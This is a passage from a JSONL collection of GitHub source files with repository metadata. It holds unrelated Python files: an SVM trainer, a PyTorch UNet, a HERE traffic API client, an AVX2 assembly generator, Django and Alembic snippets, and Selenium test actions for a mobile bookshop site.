u\"de\" or u\"en\".\n brief: Brief description of the localizable object.\n description: Long/full description of the localizable object.\n \"\"\"\n super(Localizable, self).__init__()\n self.ID = ID\n self.language = language\n self.brief = brief\n self.description = description\n\n","repo_name":"ooz/Confopy","sub_path":"confopy/analysis/localizable.py","file_name":"localizable.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"3787597965","text":"\"\"\"\r\n必要モジュールロード\r\n\"\"\"\r\nimport sys\r\nimport sklearn.svm\r\nimport pickle\r\n\r\n\r\n\"\"\"\r\n主処理\r\n\"\"\"\r\ndef main():\r\n\r\n # パラメータのバイナリファイルを読み込み、説明変数 X, 目的変数y に格納\r\n X, y = pickle.load(open(sys.argv[1], 'r+b'))\r\n # import pdb; pdb.set_trace()\r\n\r\n # SVM のインスタンス作成\r\n classifier = sklearn.svm.LinearSVC(C = 0.0001)\r\n\r\n # インスタンスに説明変数、目的変数を食わせてモデルを構築\r\n classifier.fit(X, y)\r\n\r\n # モデルをバイナリファイルで保存\r\n pickle.dump(classifier, open(sys.argv[2], 'wb'))\r\n\r\n\r\n\"\"\"\r\nお作法、他ファイルから呼び出された場合は、このスクリプトは実行されない\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"shinonome128/detectcat","sub_path":"make_model.py","file_name":"make_model.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74766875194","text":"\"\"\" Full assembly of the parts to form the complete network \"\"\"\n\nfrom __future__ import division\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import upsample\nfrom modeling.model_utils.non_local_parts import *\nfrom modeling.model_utils.unet_parts import *\nimport torch.nn.functional as F\nfrom modeling.model_utils.da_att import DANetHead\n\nclass NonlocalUNet(nn.Module):\n def __init__(self, backbone,BatchNorm, output_stride, num_classes,freeze_bn=False):\n super(NonlocalUNet, self).__init__()\n self.backbone = backbone\n self.n_classes = num_classes\n self.conv1 = nn.Conv2d(2048, 512, 1, bias=False)\n self.output_stride=output_stride\n if output_stride == 16:\n in_channels=2048\n inputstrides = [1024, 512, 128, 64]\n dilations = [1, 1, 1, 2]\n elif output_stride == 8:\n strides = [1, 2, 1, 1]\n dilations = [1, 1, 2, 4]\n else:\n raise NotImplementedError\n self.net = multi_head_attention_2d(2048, 2048, 2048, 512, 4, 0.5, 'SAME')\n\n self.head1 = DANetHead(64, 64, BatchNorm)\n self.head2 = DANetHead(256, 256, BatchNorm)\n self.head3 = DANetHead(512, 512, BatchNorm)\n self.head4 = DANetHead(2048, 512, BatchNorm)\n self.up1 = Up(1024, 512 //2,BatchNorm)\n self.up2 = Up(512, 256 // 4,BatchNorm)\n self.up3 = Up(128, 64,BatchNorm)\n self.outc = OutConv(64, num_classes)\n self.head= DANetHead(64, num_classes, BatchNorm)\n self.net_out = multi_head_attention_2d(64, 64, 64, num_classes, 4, 0.5, 'SAME')\n if freeze_bn:\n self.freeze_bn()\n\n def forward(self, x):\n #x2 = self.head1(x[5])\n #x3 = self.head2(x[3])\n #x4 = self.head3(x[2])\n x2 = x[5]\n x3 = x[3]\n x4 = x[2]\n #x5 = self.conv1(x[0])\n #x5 = self.head4(x[0])\n x5 = self.net(x[0])\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n logits = self.outc(x)\n #logits = self.net_out(x)\n x = F.interpolate(logits, scale_factor=2, mode='bilinear', align_corners=True)\n return 
x\n","repo_name":"UESTC-Liuxin/SkmtSeg","sub_path":"modeling/head/nonlocalunet.py","file_name":"nonlocalunet.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"73495601277","text":"import numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nfrom xml.etree.ElementTree import XML, fromstring, tostring\nfrom datetime import datetime\nimport pandas as pd \nimport sys\nimport matplotlib.pyplot as plt\n\n\nclass HERE_Traffic():\n def __init__(self):\n # collect current datetime\n now = datetime.now()\n self.timestamp = now.strftime(\"%Y%m%d%H%M\")\n \n def credentials(self, APP_ID, APP_CODE):\n '''Please enter HERE API credentials:\n\n API_ID : Enter HERE account application identification.\n APP_CODE : Enter HERE account application code.\n API_KEY: Enter ONLY for traffic incident data. Default value is null.\n '''\n self.APP_ID = APP_ID\n self.APP_CODE = APP_CODE\n\n def bbox(self, lat0, lon0, lat1, lon1):\n '''Bounding-box information for traffic flow.\n '''\n self.lat0 = lat0\n self.lon0 = lon0\n self.lat1 = lat1\n self.lon1 = lon1\n\n def _connect_traffic_flow(self):\n '''Connects to HERE Traffic API using bbox and API credentials. Returns parsed XML response.\n If invalid credentials are used returns error message.\n '''\n \n page = requests.get(f'https://traffic.api.here.com/traffic/6.3/flow.xml?app_id={self.APP_ID}&app_code={self.APP_CODE}&bbox={self.lat0},{self.lon0};{self.lat1},{self.lon1}&responseattributes=sh,fc')\n \n # if credentials are incorrect, prompt error message and kill program.\n if str(page) == '':\n sys.exit(\"Invalid credentials. Please re-enter correct API identification number or code.\")\n else:\n soup = BeautifulSoup(page.text, \"lxml\")\n response = soup.find_all('fi')\n\n return response\n \n def _connect_incident_reports(self):\n '''Connects to HERE Incident API using bbox and API credentials. Returns parsed html response.\n '''\n page = requests.get(f'https://traffic.api.here.com/traffic/6.3/incidents.xml?app_id={self.APP_ID}&app_code={self.APP_CODE}&bbox={self.lat0},{self.lon0};{self.lat1},{self.lon1}&responseattributes=sh,fc')\n soup = BeautifulSoup(page.text, \"html.parser\")\n parsed = soup.find_all(\"trafficml_incidents\")[0]\n\n return parsed\n\n\n def traffic_flow(self):\n '''\n Returns traffic flow information, latitudes, longitudes, road names. \n '''\n # call traffic response \n response = self._connect_traffic_flow()\n # loop through each road and collect road type, road speed limit, actual real-time \n # road speed, road name, and traffic direction. \n a1=[]\n loc_list_hv=[]\n lats=[]\n lons=[]\n speed_uncapped=[]\n speed_capped=[]\n jam_factor=[]\n free_flow_spd=[]\n names = []\n direction=[]\n c=0\n for html_response in response:\n #for j in range(0,len(shps)):\n xml_response = fromstring(str(html_response))\n fc=5\n for road in xml_response:\n if('fc' in road.attrib):\n fc=int(road.attrib['fc'])\n if('cn' in road.attrib):\n cn=float(road.attrib['cn'])\n if('su' in road.attrib):\n su=float(road.attrib['su'])\n if('sp' in road.attrib):\n sp=float(road.attrib['sp'])\n if('jf' in road.attrib):\n jf=float(road.attrib['jf'])\n if('ff' in road.attrib):\n ff=float(road.attrib['ff'])\n if('de' in road.attrib):\n de=(road.attrib['de'])\n if('qd' in road.attrib):\n qd=(road.attrib['qd'])\n \n # split road information into individual latitude/longitude arrays based on road shape\n # fc is highways and major roadways. 
CN is confidence in real-time traffic flow information (max 1). At least 70%.\n if((fc<=5) and (cn>=0.7)):\n\n # road shapes by lat/lon coordinates\n shps=html_response.find_all(\"shp\")\n\n for j in range(0,len(shps)):\n latlong=shps[j].text.replace(',',' ').split()\n #loc_list=[]\n la=[]\n lo=[]\n su1=[]\n ff1=[]\n sp1=[]\n jf1=[]\n qd1 = []\n name=[]\n\n for i in range(0,int(len(latlong)/2)):\n # organized as pairs (lat , lon) therefore split by lat/lon values. \n loc_list_hv.append([float(latlong[2*i]),float(latlong[2*i+1]),float(su),float(ff)])\n la.append(float(latlong[2*i]))\n lo.append(float(latlong[2*i+1]))\n su1.append(float(su))\n ff1.append(float(ff))\n sp1.append(float(sp))\n jf1.append(float(jf))\n name.append(de)\n qd1.append(qd)\n lats.append(la)\n lons.append(lo)\n speed_uncapped.append(np.mean(su1))\n speed_capped.append(np.mean(sp1))\n jam_factor.append(np.mean(jf1))\n free_flow_spd.append(np.mean(ff1))\n names.append(str(de))\n direction.append(qd1[0])\n \n return names, direction, lats, lons, speed_capped ,speed_uncapped, free_flow_spd, jam_factor\n\n def incident_report(self):\n ''' Returns incident type (construction, roadwork, accident, etc) along with coordinates of the incident location and the roads affected.\n '''\n # call incident response \n response = self._connect_incident_reports()\n\n # collect the incident description, status, coordinates, and street path coordinates\n descs = response.find_all(\"traffic_item_type_desc\")\n stat = response.find_all(\"traffic_item_status_short_desc\")\n point_lat = response.find_all(\"latitude\")\n point_lon = response.find_all(\"longitude\")\n shps = response.find_all(\"shapes\")\n\n # predefine variables\n lats=[]\n lons=[]\n latlong = []\n descriptions = []\n status = []\n latitude = []\n longitude = []\n\n # loop and collect the incident information for each case\n for j in range(0,len(shps)):\n latlong=shps[j].text.replace(',',' ').split()\n desc = descs[j].text\n stats = stat[j].text\n point_lats = point_lat[j].text\n point_lons = point_lon[j].text\n la=[]\n lo=[]\n # remove combined latlon values that are duplicates and incorrectly listed\n [latlong.remove(x) for x in latlong if len(x)>10]\n\n # assign each lat and lon point\n for i in range(0,int(len(latlong)/2)):\n la.append(float(latlong[2*i]))\n lo.append(float(latlong[2*i+1])) \n \n # append the information into lists \n lats.append(la)\n lons.append(lo)\n descriptions.append(desc) \n status.append(stats) \n latitude.append(point_lats) \n longitude.append(point_lons) \n\n return descriptions, status, latitude, longitude, lats, lons\n\n def generate_traffic_csv(self, outdir):\n '''This function generates a CSV containing traffic variables for each road segment in the specified bbox.\n Please specify an out directory.\n '''\n # call variables from traffic flow function\n names, qd, lats, lons, speed_capped ,speed_uncapped, free_flow_spd, jam_factor = self.traffic_flow()\n\n # store variables in dataframe\n traffic_df = pd.DataFrame({\"road_name\": names, \"direction\":qd,\"lats\":lats, \"lons\":lons, \"sp\":speed_capped, \"su\":speed_uncapped,\"ffs\":free_flow_spd, \"jf\":jam_factor})\n traffic_df.sp = traffic_df.sp.round(0)\n traffic_df.su = traffic_df.su.round(0)\n traffic_df.ffs = traffic_df.ffs.round(0)\n\n # create CSV file containing the variables\n traffic_df.to_csv(f\"{outdir}/oxford_traffic_{self.timestamp}.csv\")\n\n def generate_incident_csv(self, outdir):\n '''This function generates a CSV containing incident variables for each road segment in the 
specified bbox.\n Please specify an out directory.\n '''\n # call variables from incident report function\n descriptions, status, latitude, longitude, lats0, lons0 = self.incident_report()\n\n # store variables in dataframe\n incident_df = pd.DataFrame({\"status\":status, \"desc\":descriptions, \"point_lat\":latitude, \"point_lon\":longitude,\n \"lats\":lats0, \"lons\":lons0})\n\n # create CSV file containing the variables\n incident_df.to_csv(f\"{outdir}/oxford_incident_{self.timestamp}.csv\")\n\n\n\n\n","repo_name":"ldicarlo1/development_of_traffic_model_for_Oxford","sub_path":"classes/HERE_Traffic_API.py","file_name":"HERE_Traffic_API.py","file_ext":"py","file_size_in_byte":9022,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"40487566452","text":"import sys\n\nL = 8\n\ndef ffs(i):\n if i == 0:\n return -1\n k = 0\n while i & 0x0001 == 0:\n k += 1\n i >>= 1\n return k\n\ndef idxq(i, j):\n assert i < j\n return i + j * (j - 1) // 2\n\n\nprint(\"\"\"\n################################################################################\n# This file was auto-generated by {script}\n# The loop is unrolled {unroll} times\n################################################################################\n\"\"\".format(script=sys.argv[0], unroll=2**L))\n\nprint(\"\"\"\n# the System V AMD64 ABI says that :\n# A) The first six integer or pointer arguments are passed in registers RDI, RSI, RDX, RCX, R8, R9\n# B) we should preserve the values of %rbx, %rbp, %r12...%r15 [callee-save registers]\n# C) We will receive the arguments of the function in registers :\n# Fq in %rdi\n# Fl in %rsi\n# alpha in %rdx\n# beta in %rcx\n# gamma in %r8\n# D) we return the mask in %rax\n\n# no need to save the callee-save registers (we do not touch them)\n# Load the 13 most used values into %ymm0-%ymm12\n# %ymm15 is pinned to zero\n# %ymm14 is used for temporary storage (could be dispensed with)\n# %ymm13 contains the mask\n\n# we may still use %9, %r10 and %r11\n# %r11 contains the comparison output mask \n# %r9 and %r10 are available\n\n# This uses only \"light\" AVX2 instructions (no FP, no MUL). But cores runs at \"AVX2\" speed.\n# Scheduling on Haswell : each step is 4 instructions ;\n# three steps send 4 uops to ports 0,1,5 (in the best case)\n# three steps thus take at least 4 cycles\n# peak performance is then 16x3 candidates in 4 cycles --> 12 candidates/cycle\n# \n# Measured : 5.75 cycles for three steps without hyperthreading\n# Measured : 4.45 cycles for three steps with hyperthreading\n#\n# This is a 35% speedup wrt the non-batch version. 
Even with 10% additionnal work afterwards, there is a clear gain.\n\n### extern u32 feslite_avx2_asm_enum_batch(const __m256i * Fq, __m256i * Fl, u64 alpha, u64 beta, u64 gamma)\n\n.text\n.p2align 5\n\n.globl feslite_avx2_asm_enum_batch\nfeslite_avx2_asm_enum_batch:\n\n# multiply alpha, beta, gamma by 32\nshlq $5, %rdx\nshlq $5, %rcx\nshlq $5, %r8\n\nvpxor %ymm15, %ymm15, %ymm15 # set %ymm15 to always-zero\nvpxor %ymm13, %ymm13, %ymm13 # initialize acc (%ymm13) to zero\n\nmovq %r9, %rax # prepare the return value\n\"\"\")\n\nFl = {}\nFl[0] = \"%ymm0\" # 1\nFl[1] = \"%ymm1\" # 1/2\nFl[2] = \"%ymm2\" # 1/4\nFl[3] = \"%ymm3\" # 1/8\nFl[4] = \"%ymm4\" # 1/16\nFl[5] = \"%ymm5\" # 1/32\nFl[6] = \"%ymm6\" # 1/64\n\nFq = {}\nFq[idxq(0, 1)] = \"%ymm7\" # 1/4\nFq[idxq(0, 2)] = \"%ymm8\" # 1/8\nFq[idxq(1, 2)] = \"%ymm9\" # 1/8\nFq[idxq(0, 3)] = \"%ymm10\" # 1/16\nFq[idxq(1, 3)] = \"%ymm11\" # 1/16\nFq[idxq(2, 3)] = \"%ymm12\" # 1/16\n\nassert Fl[0] == \"%ymm0\"\n\ndef output_comparison(i, between_cmp_or=None):\n # before the XORs, the comparison\n print('vpcmpeqd %ymm0, %ymm15, %ymm15'.format())\n if between_cmp_or:\n print(between_cmp_or)\n print('vpor %ymm15, %ymm13, %ymm13')\n\nstats = {'reg/reg': 0, 'mem/reg': 0, 'mem/mem': 0}\n\ndef compute_update(i, a, b):\n # There are 3 possible cases :\n # 1a. Fq in register, Fl in register\n # 1b. Fq in memory, Fl in register\n # 2. Fq in memory, Fl in memory\n if a in Fl:\n if b in Fq: # reg / reg\n stats['reg/reg'] += 1\n xor1 = \"vpxor {src}, {dst}, {dst}\".format(src=Fq[b], dst=Fl[a])\n elif Fq_memref is None: # mem / reg\n stats['mem/reg'] += 1\n xor1 = \"vpxor {offset}(%rdi), {dst}, {dst}\".format(offset=32*b, dst=Fl[a])\n else: # mem(alpha) / reg\n stats['mem/reg'] += 1\n xor1 = \"vpxor {src}, {dst}, {dst}\".format(src=Fq_memref, dst=Fl[a])\n xor2 = \"vpxor {src}, %ymm0, %ymm0\".format(src=Fl[a])\n return (xor1, xor2)\n\n else: # (a not in Fl)\n stats['mem/mem'] += 1\n assert b not in Fq\n xor1a = \"vmovdqa {offset}(%rsi), %ymm14\".format(offset=32*a) # load Fl[a]\n if Fq_memref is None: \n xor1b = \"vpxor {offset}(%rdi), %ymm14, %ymm14\".format(offset=32*b)\n else:\n xor1b = \"vpxor {src}, %ymm14, %ymm14\".format(src=Fq_memref)\n xor1c = \"vmovdqa %ymm14, {offset}(%rsi)\".format(offset=32*a) # store Fl[a]\n xor2 = \"vpxor %ymm14, %ymm0, %ymm0\"\n return (\"\\n\".join([xor1a, xor1b, xor1c]), xor2)\n\n###################\"\"\n\nprint( \"# load the most-frequently used values into vector registers\" )\nfor i, reg in Fl.items():\n print(\"vmovdqa {offset}(%rsi), {reg} ## {reg} = Fl[{i}]\".format(offset=i*32, reg=reg, i=i))\nprint()\nfor x, reg in Fq.items():\n print(\"vmovdqa {offset}(%rdi), {reg} ## {reg} = Fq[{idx}]\".format(offset=x*32, reg=reg, idx=x))\nprint()\n\nalpha = 0\nfor i in range((1 << L) - 1):\n ########################## UNROLLED LOOP #######################################\n idx1 = ffs(i + 1) \n idx2 = ffs((i + 1) ^ (1 << idx1))\n a = idx1 + 1 # offset dans Fl\n Fq_memref = None\n if idx2 == -1:\n Fq_memref = \"{offset}(%rdi, %rdx)\".format(offset=32*alpha)\n b = \"alpha + {}\".format(alpha)\n alpha += 1\n else:\n assert idx1 < idx2\n b = idxq(idx1, idx2) # offset dans Fq\n\n print()\n print('##### step {:3d} : Fl[0] ^= (Fl[{}] ^= Fq[{}])'.format(i, a, b))\n print()\n xor1, xor2 = compute_update(i, a, b)\n output_comparison(i)\n print(xor1)\n print(xor2)\n print()\n\n####### ne pas oublier le dernier tour special\nprint('#############################')\nprint('# end of the unrolled chunk 
#')\nprint('#############################')\nprint()\nprint(\"# Save the Fl[1:] back to memory\")\nfor i, reg in Fl.items():\n if i == 0:\n continue\n print(\"vmovdqa {reg}, {offset:2d}(%rsi) #Fl[{i}] <-- {reg}\".format(offset=i*32, reg=reg, i=i))\nprint()\nprint('##### special last step {:3d} : Fl[0] ^= (Fl[beta] ^= Fq[gamma])'.format((1 << L) - 1))\nprint()\noutput_comparison((1 << L) - 1)\nprint(\"vmovdqa (%rsi, %rcx), %ymm14\") # load Fl[beta]\nprint(\"vpxor (%rdi, %r8), %ymm14, %ymm14\") # xor Fq[gamma]\nprint(\"vmovdqa %ymm14, (%rsi, %rcx)\") # store Fl[beta]\nprint(\"vpxor %ymm14, %ymm0, %ymm0\")\nprint()\nprint(\"# Save Fl[0] back to memory\")\nprint(\"vmovdqa %ymm0, (%rsi) #Fl[0] <-- %ymm0\")\nprint()\nprint(\"# Save acc back to memory\")\nprint(\"vpmovmskb %ymm13, %eax #return value <-- %ymm13\")\n\nprint('ret')\nprint()\nprint(\"####################################################\")\nprint(\"# Stats\")\nprint(\"# reg / reg : {}\".format(stats['reg/reg']))\nprint(\"# mem / reg : {}\".format(stats['mem/reg']))\nprint(\"# mem / mem : {}\".format(stats['mem/mem']))\n","repo_name":"cbouilla/libfes-lite","sub_path":"src/avx2_codegen_batch.py","file_name":"avx2_codegen_batch.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"96"} +{"seq_id":"10488280318","text":"from django.test import override_settings\n\nfrom ..context_processors import env\n\n\n@override_settings(SENTRY_DSN=\"https://example.com\")\ndef test_env(rf):\n result = env(rf.get(\"/\"))\n\n assert \"GLOBALS\" in result\n assert \"SENTRY_DSN\" in result[\"GLOBALS\"]\n","repo_name":"SFDO-Tooling/sfdo-template","sub_path":"{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/tests/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"96"} +{"seq_id":"5490607330","text":"from unidecode import unidecode\n\n\nclass Person:\n def __init__(\n self,\n first_name,\n surname,\n second_name=\"\",\n address=\"\",\n email=\"\",\n acquaintances=None,\n ):\n self.first_name = first_name\n self.surname = surname\n self.second_name = second_name\n self.email = email or unidecode(first_name + surname).lower() + \"@gmail.com\"\n self.address = address\n self.acquaintances = [] if acquaintances is None else acquaintances\n\n def __eq__(self, other):\n if self.first_name == other.first_name and self.surname == other.surname:\n return True\n return False\n\n def add_acquaintance(self, acquaintance):\n self.acquaintances.append(acquaintance)\n return self.acquaintances\n\n def del_acquaintance(self, acquaintance):\n if acquaintance in self.acquaintances:\n self.acquaintances.remove(acquaintance)\n return self.acquaintances\n","repo_name":"alexgrck/Python-Fundamentals","sub_path":"2_Object-oriented_programming/1_EASY/person/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36839267453","text":"\"\"\"a new migration\n\nRevision ID: ff7eb255fc5c\nRevises: a2d2cd05fd0f\nCreate Date: 2022-05-19 14:18:31.963414\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ff7eb255fc5c'\ndown_revision = 'a2d2cd05fd0f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please 
adjust! ###\n op.add_column('meals', sa.Column('meal_name', sa.String(length=255), nullable=True))\n op.drop_column('meals', 'column')\n op.drop_column('meals', 'meal')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('meals', sa.Column('meal', sa.VARCHAR(length=255), autoincrement=False, nullable=True))\n op.add_column('meals', sa.Column('column', sa.VARCHAR(length=255), autoincrement=False, nullable=True))\n op.drop_column('meals', 'meal_name')\n # ### end Alembic commands ###\n","repo_name":"edah-hub/foodAirline","sub_path":"migrations/versions/ff7eb255fc5c_a_new_migration.py","file_name":"ff7eb255fc5c_a_new_migration.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"43313632135","text":"from django.shortcuts import render\nfrom django.views import View\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nimport pickle\nimport numpy as np\n\n\n# Create your views here.\nnltk.download('wordnet')\n\n\nafile = open('/home/sergio/Topicos/Corpusgoogle/corpusgoogledjango/PROJECT/APP/db03', 'rb')\ndb = pickle.load(afile)\nafile.close()\n\ndef takeSecond(elem):\n return elem[1]\n\ndef createBooleanArray(positions, size):\n vec = np.zeros(size, dtype=bool)\n for p in positions:\n # print(p)\n vec[p] = 1\n return vec\n\n\ndef compareVectors(word, theDict, size):\n positions = theDict[word]\n keys = theDict.keys()\n vect1 = createBooleanArray(positions, size)\n\n allPorcentages = []\n\n for k in keys:\n pos = theDict[k]\n vect2 = createBooleanArray(pos, size)\n\n # vecRes = np.invert(np.logical_xor(vect1,vect2))\n # concur = np.count_nonzero(vecRes)\n # result = concur/size\n result = (np.logical_and(vect1, vect2)).sum() / float((np.logical_or(vect1, vect2)).sum())\n allPorcentages.append((k, result))\n allPorcentages.sort(key=takeSecond, reverse=True)\n\n return allPorcentages\n\nclass Index(View):\n template_name = \"index.html\"\n\n lemmatizer = WordNetLemmatizer()\n context = {}\n\n def post(self, request):\n text = request.POST.get('my_textarea')\n self.context['txt'] = text\n # print(cleanner(tokens))\n actualword = text.lower()\n lemword = self.lemmatizer.lemmatize(actualword, pos=\"v\")\n if(actualword == lemword):\n lemword = self.lemmatizer.lemmatize(lemword, pos=\"n\")\n\n all = compareVectors(text, db, 500000)\n\n self.context['answer'] = all[0:100]\n # print(stems)\n\n return render(request, self.template_name, self.context)\n\n def get(self, request):\n return render(request, self.template_name)","repo_name":"sergiorvs/corpusgoogle","sub_path":"corpusgoogledjango/PROJECT/APP/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25573915987","text":"from MobileTest.Page.MSitePage import MSitePage\nfrom Module import Uri, UserInfo\nfrom Public.Toolkit import Toolkit\nimport time\n\n\nclass MSiteAction:\n def __init__(self):\n self.page = MSitePage()\n self.temp_data = ''\n\n # 搜索\n def search(self, search_content, search_type):\n self.page.go_to(Uri.MSearchPage)\n self.page.wait_until_clickable(self.page.search_submit_css)\n if search_type == 'book':\n self.page.book_search_tab.click()\n if search_type == 'auction':\n self.page.auction_search_tab.click()\n if search_type == 'shop':\n self.page.shop_search_tab.click()\n 
self.page.search_txt.send_keys(search_content)\n self.page.search_submit_btn.click()\n\n # 获取搜索结果\n def get_search_result(self, search_type):\n results = []\n if search_type == 'book':\n for result in self.page.book_search_result:\n results.append(result.text)\n if search_type == 'auction':\n for result in self.page.auction_search_result:\n results.append(result.text)\n if search_type == 'shop':\n for result in self.page.shop_search_result:\n results.append(result.text)\n return results\n\n # 添加图书到收藏夹\n def add_book_to_favorite(self):\n self.page.go_to(Uri.MBookDetailPage)\n self.page.book_fav_btn.click()\n\n # 删除收藏夹内的图书\n def delete_book_in_favorite(self):\n for del_btn in self.page.del_fav_book_btn:\n del_btn.click()\n time.sleep(1)\n\n # 验证图书收藏夹\n def verify_book_fav(self, is_exist):\n result = False\n self.page.go_to(Uri.FavMProdPage)\n time.sleep(1)\n self.page.wait_until_not_clickable(self.page.loading_css)\n if is_exist is True:\n for book_name in self.page.fav_books_name:\n if book_name.text == '测试用书请勿购买':\n result = True\n if is_exist is False:\n if self.page.no_data.text == '暂无数据':\n result = True\n return result\n\n # 添加店铺到收藏夹\n def add_shop_to_favorite(self):\n self.page.go_to(Uri.MShopPage)\n self.page.shop_fav_btn.click()\n\n # 删除收藏夹内的店铺\n def delete_shop_in_favorite(self):\n for del_btn in self.page.del_fav_shop_btn:\n del_btn.click()\n time.sleep(1)\n\n # 验证店铺收藏夹\n def verify_shop_fav(self, is_exist):\n result = False\n self.page.go_to(Uri.FavMShopPage)\n time.sleep(1)\n self.page.wait_until_not_clickable(self.page.loading_css)\n if is_exist is True:\n for shop_name in self.page.fav_shops_name:\n if shop_name.text == UserInfo.User3 + '的书店':\n result = True\n if is_exist is False:\n if self.page.no_data.text == '暂无数据':\n result = True\n return result\n\n # 添加拍品到收藏夹\n def add_auction_to_favorite(self):\n self.page.go_to(Uri.MAuctionDetailPage)\n self.page.wait_until_clickable(self.page.auction_fav_css)\n self.page.auction_fav_btn.click()\n\n # 删除拍品到收藏夹\n def delete_auction_to_favorite(self):\n for del_btn in self.page.del_fav_auction_btn:\n del_btn.click()\n time.sleep(1)\n\n # 验证拍卖收藏夹\n def verify_auction_fav(self, is_exist):\n result = False\n self.page.go_to(Uri.FavMAuctionPage)\n time.sleep(2)\n if is_exist is True:\n for shop_name in self.page.fav_auction_name:\n if '测试拍卖请勿购买' in shop_name.text:\n result = True\n if is_exist is False:\n if self.page.no_data.text == '暂无数据':\n result = True\n return result\n\n # 登录\n def login(self,user='user2'):\n self.page.go_to(Uri.MLoginPage)\n if user == 'user1':\n self.page.login_name_txt.send_keys(UserInfo.User1)\n if user == 'user2':\n self.page.login_name_txt.send_keys(UserInfo.User2)\n self.page.login_pwd_txt.send_keys(UserInfo.PwdLogin)\n self.page.login_submit_btn.click()\n time.sleep(2)\n\n # 修改登录密码\n def change_login_pwd(self, old, new):\n self.page.go_to(Uri.MChangePwdPage)\n self.page.old_pwd_txt.send_keys(old)\n self.page.new_pwd_txt.send_keys(new)\n self.page.change_pwd_submit_btn.click()\n self.page.wait_until_clickable(self.page.success_msg_css)\n\n # 获取成功提示文本\n def get_success_txt(self):\n return self.page.success_msg.text\n\n # 添加收货地址\n def add_receive_address(self):\n self.page.go_to(Uri.MReceiveAddressPage)\n self.page.wait_until_clickable(self.page.address_submit_css)\n self.page.address_submit_btn.click()\n self.page.receiver_name_txt.send_keys('自动化')\n self.page.receiver_mobile_txt.send_keys('18510291234')\n self.page.receiver_area.click()\n time.sleep(1)\n self.page.receiver_area_confirm_btn.click()\n 
self.page.receiver_address_txt.send_keys('红厂孔夫子A6')\n self.page.address_submit_btn.click()\n\n # 编辑收货地址\n def edit_receive_address(self):\n self.page.go_to(Uri.MReceiveAddressPage)\n self.page.wait_until_clickable(self.page.edit_address_css)\n self.page.edit_address_btn.click()\n time.sleep(1)\n self.page.address_submit_btn.click()\n\n # 删除收货地址\n def del_receive_address(self):\n self.page.go_to(Uri.MReceiveAddressPage)\n self.page.wait_until_clickable(self.page.address_submit_css)\n for btn in self.page.del_address_btn:\n btn.click()\n self.page.wait_until_clickable(self.page.confirm_css)\n self.page.confirm_btn.click()\n time.sleep(1)\n\n # 获取提示框内文本\n def get_tip_view_txt(self):\n self.page.wait_until_clickable(self.page.tip_view_css)\n return self.page.tip_view.text\n\n # 将图书加到购物车\n def add_book_to_cart(self):\n self.page.go_to(Uri.MBookDetailPage)\n self.page.add_cart_btn.click()\n\n # 去购物车结算\n def settle_in_cart(self):\n self.page.go_to(Uri.MCartPage)\n self.page.wait_until_clickable(self.page.cart_item_css)\n self.page.check_all_rdo.click()\n self.page.go_to_pay_btn.click()\n self.page.wait_until_clickable(self.page.order_book_box_css)\n self.page.create_order_btn.click()\n\n # 获取生成订单后的文本\n def get_submit_result_txt(self):\n self.page.wait_until_clickable(self.page.submit_order_result_css)\n time.sleep(1)\n return self.page.submit_order_result.text\n\n # 进行常规竞价\n def bid(self):\n self.page.go_to(Uri.MAuctionDetailPage)\n self.page.wait_until_clickable(self.page.pop_bid_win_css)\n self.page.pop_bid_win_btn.click()\n time.sleep(1)\n self.page.bid_btn.click()\n\n # 设置代理价\n def set_agent(self):\n self.page.go_to(Uri.MAuctionDetailPage)\n self.page.pop_bid_win_btn.click()\n time.sleep(1)\n self.page.agent_bid_tab.click()\n time.sleep(1)\n self.page.agent_bid_btn.click()\n\n # 跳转到联系人列表页\n def go_to_contact_page(self):\n self.page.go_to(Uri.MContactPage)\n\n # 搜索用户\n def search_user(self, user):\n if user == 'user1':\n self.page.search_friend_txt.send_keys(UserInfo.User1)\n if user == 'user2':\n self.page.search_friend_txt.send_keys(UserInfo.User2)\n self.page.search_user_btn.click()\n\n # 发送消息\n def send_message(self):\n self.temp_data = Toolkit.get_random_value()\n self.page.search_user_result.click()\n time.sleep(1)\n self.page.send_message_txt.send_keys(self.temp_data)\n self.page.send_btn.click()\n\n # 验证收到消息\n def verify_message_received(self):\n self.go_to_contact_page()\n self.search_user('user1')\n self.page.search_user_result.click()\n time.sleep(1)\n result = False\n for message in self.page.message_collection:\n if message.text == self.temp_data:\n result = True\n return result\n\n # 买家评价订单/交易\n def eval(self, user_type, eval_type):\n if user_type == 'buyer':\n self.page.go_to(Uri.MLoginPage, token=Toolkit.get_user_token(UserInfo.User1, UserInfo.PwdLogin))\n if eval_type == 'order':\n self.page.go_to(Uri.MBuyerEvalOrderPage)\n 